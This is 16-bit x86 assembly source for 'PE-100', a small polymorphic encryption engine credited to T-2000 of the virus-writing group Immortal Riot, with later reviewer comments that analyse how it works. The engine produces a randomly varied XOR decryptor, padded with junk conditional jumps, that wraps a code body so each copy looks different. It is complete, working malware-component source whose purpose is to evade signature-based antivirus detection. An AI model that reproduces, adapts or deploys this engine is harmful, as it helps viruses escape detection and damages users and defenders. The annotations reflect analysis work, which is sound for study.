;============================================================================
;
;       PE-100 by T-2000 / Immortal Riot.
;
;       Written on a cloudy afternoon somewhere in February 1999.
;
;  Attempt to write a small but effective polymorphic engine, uses BX/SI/DI/BP
;  as a pointer-register and conditional JMPs as junk. Size engine: 125 bytes.
;
;       Call with:                              Returns:
;
;       DS:SI = Code to encrypt.                CX = Size encrypted code.
;       ES:DI = Destination-buffer.
;       CX    = Length of code to encrypt.      All registers except BX
;       BP    = Delta-offset at runtime.        and SP are destroyed.
;
;----------------------------------------------------------------------------
;  Analysis notes (derived from the listing below; 16-bit real-mode x86,
;  Intel operand order).
;
;  The engine writes a decryptor to ES:DI and then the input XORed with a
;  one-byte key. The decryptor's instruction order is fixed; the only
;  variation is the pointer register, the key and whether each junk slot
;  is filled. A junk slot is either empty or exactly one two-byte
;  conditional short jump with displacement 0 (70h-7Fh, 00h).
;
;       [junk]  B9 iw                MOV  CX, length
;       [junk]  BB/BD/BE/BF iw       MOV  ptr, delta + size of decryptor
;       [junk]  2E 80 modrm [00] ib  XOR  BYTE PTR CS:[ptr], key
;       [junk]  43/45/46/47          INC  ptr
;               E2 rel8              LOOP (back to the junk slot before XOR)
;       [junk]
;               body, each byte XORed with the same key byte
;
;  modrm comes from Ptr_Addr: 37h [BX], 76h [BP+disp8] (followed by a 00h
;  displacement byte), 34h [SI], 35h [DI].
;
;  All random values are read with IN AL,40h (counter 0 of the system timer
;  on PC-compatible hardware). The key is not checked for 0, so a key of 0
;  leaves the body unchanged.
;
;  'PE-100',0 and 'T2IR',0 are stored as data after the code. Whether they
;  end up inside an encrypted region depends on the caller, which is not
;  part of this listing.
;============================================================================

                .MODEL  TINY
                .STACK  1024
                .CODE

START:

PE_100:
                PUSH    BX                      ; Save filehandle.
                PUSH    CX                      ; Save amount to copy.

                CALL    Add_Bogus               ; Junk slot 1.

                MOV     AL, 0B9h                ; MOV CX,
                STOSB

                ; AX := input length, stored as the imm16 of MOV CX.
                ; AH keeps the high byte of the length from here on; the
                ; code that follows changes AL only.
                XCHG    CX, AX                  ; Size of encrypted code.
                STOSW

                CALL    Add_Bogus               ; Junk slot 2.

                ; Retry until AL is 0, 2, 3 or 4; after the ADD that is
                ; opcode BBh (BX), BDh (BP), BEh (SI) or BFh (DI).
Get_Random:     IN      AL, 40h                 ; Get a random value.
                CMP     AL, 4                   ; Must be 0 - 4.
                JA      Get_Random

                CMP     AL, 1                   ; Avoid SP.
                JE      Get_Random

                ADD     AL, (0B8h + 3)          ; MOV Reg16,
                STOSB

                XCHG    BX, AX                  ; Save Ptr_Reg16.

                PUSH    DI                      ; Address of the imm16 that
                                                ; is patched further down.

                XCHG    BP, AX                  ; Delta-offset at runtime.
                STOSW

                MOV     CX, DI                  ; Save offset decrypt-loop.

                CALL    Add_Bogus               ; Junk slot 3 (inside loop).

                ; STOSW writes the low byte first: 2Eh (CS: override),
                ; then 80h (byte operation with an immediate operand).
                MOV     AX, 802Eh               ; XOR BYTE PTR [Ptr_Reg16],
                STOSW

                ; Fetch the ModRM byte for the chosen register from Ptr_Addr.
                ; NOTE(review): the effective address uses all of BX, and BH
                ; holds the high byte of the input length here; it also takes
                ; (Ptr_Addr - Start) as an offset in DS. The emitted ModRM is
                ; one of the table bytes only under those conditions -
                ; confirm against samples.
                MOV     AL, [BX.(Ptr_Addr - Start) - (0B8h + 3)]
                STOSB

                CMP     AL, 76h                 ; Ptr_Reg16 is BP ?
                JNE     Get_Encr_Key

                XOR     AL, AL                  ; BP needs displacement.
                STOSB

Get_Encr_Key:   IN      AL, 40h                 ; Get random encryption-key.
                STOSB                           ; imm8 operand of the XOR.

                XCHG    BP, AX                  ; Save encryption-key in BP.

                CALL    Add_Bogus               ; Junk slot 4 (inside loop).

                ; BL still holds the MOV opcode (B8h + reg); the ADD turns
                ; it into 40h + reg, the one-byte INC of the same register.
                XCHG    BX, AX
                ADD     AL, (40h + 3) - (0B8h + 3)      ; INC Ptr_Reg16.
                STOSB

                ; rel8 for LOOP = -((DI - CX) + 2); INC then NOT on the low
                ; byte gives that value.
                MOV     AX, DI                  ; Displacement between LOOP
                SUB     AX, CX                  ; and Decryption_Loop.
                INC     AX                      ; Convert value since it's
                NOT     AL                      ; a LOOP backwards.

                MOV     AH, AL
                MOV     AL, 0E2h                ; LOOP Decryption_Loop.
                STOSW

                CALL    Add_Bogus               ; Junk slot 5.

                ; NOTE(review): DI - (Buffer - Start) is a byte count only
                ; if the destination buffer begins at offset Buffer - Start;
                ; presumably the caller passes DI = OFFSET Buffer - confirm.
                LEA     CX, [DI-(Buffer-Start)] ; Size of decryptor.

                ; Add the decryptor size to the delta stored earlier, so the
                ; pointer register starts at the first encrypted byte. The
                ; access goes through DS, while the word was written through
                ; ES; presumably DS = ES in the caller - confirm.
                POP     BX                      ; Delta-offset encrypted.
                ADD     [BX], CX                ; Patch correct code-offset.

Encrypt_Poly:   POP     CX                      ; Input length saved on entry.

                ; Only AL is stored, so only the low byte of BP (the key)
                ; affects the output.
Encrypt_Byte:   LODSB                           ; Load a byte from source.
                XOR     AX, BP                  ; Encrypt it.
                STOSB                           ; And put it in destination.
                LOOP    Encrypt_Byte            ; Do the whole thing.

                LEA     CX, [DI-(Buffer-Start)] ; Get total size of code.

                POP     BX                      ; Value pushed on entry.

                ; No RETN here: execution falls through into Add_Bogus, and
                ; its RETN returns to the engine's caller. If that last pass
                ; writes a junk jump, DI moves two bytes further while CX
                ; was already computed above.

; 1/2 chance of adding a bogus conditional JMP.
;
; In:  ES:DI = write position.  Out: DI advanced by 0 or 2.  Changes AL, flags.
; OR AL,AL sets the parity flag from the random byte: even parity skips the
; junk, odd parity writes 7xh, 00h, a conditional jump to the instruction
; that follows it, so the branch has no effect either way.
Add_Bogus:
                IN      AL, 40h                 ; Get a random value.
                OR      AL, AL                  ; Should we add a JMP ?
                JP      Exit_Add_Bogus

                AND     AL, 15                  ; 0 - 15.
                ADD     AL, 70h                 ; Make a random JMP.
                STOSB

                XOR     AL, AL                  ; Zero displacement.
                STOSB

Exit_Add_Bogus: RETN

; Constant marker string stored with the engine.
PE_100_Marker   DB      'PE-100', 0

; ModRM bytes for the XOR, indexed by (MOV opcode - 0BBh):
; BX -> 37h, SP slot (never chosen) -> 00h, BP -> 76h, SI -> 34h, DI -> 35h.
Ptr_Addr        DB      37h, 00h, 76h, 34h, 35h

; Constant author tag stored with the engine.
Author_Mark     DB      'T2IR', 0

; End of the engine image; the two LEA instructions above measure output
; size relative to this label.
Buffer:

                END     START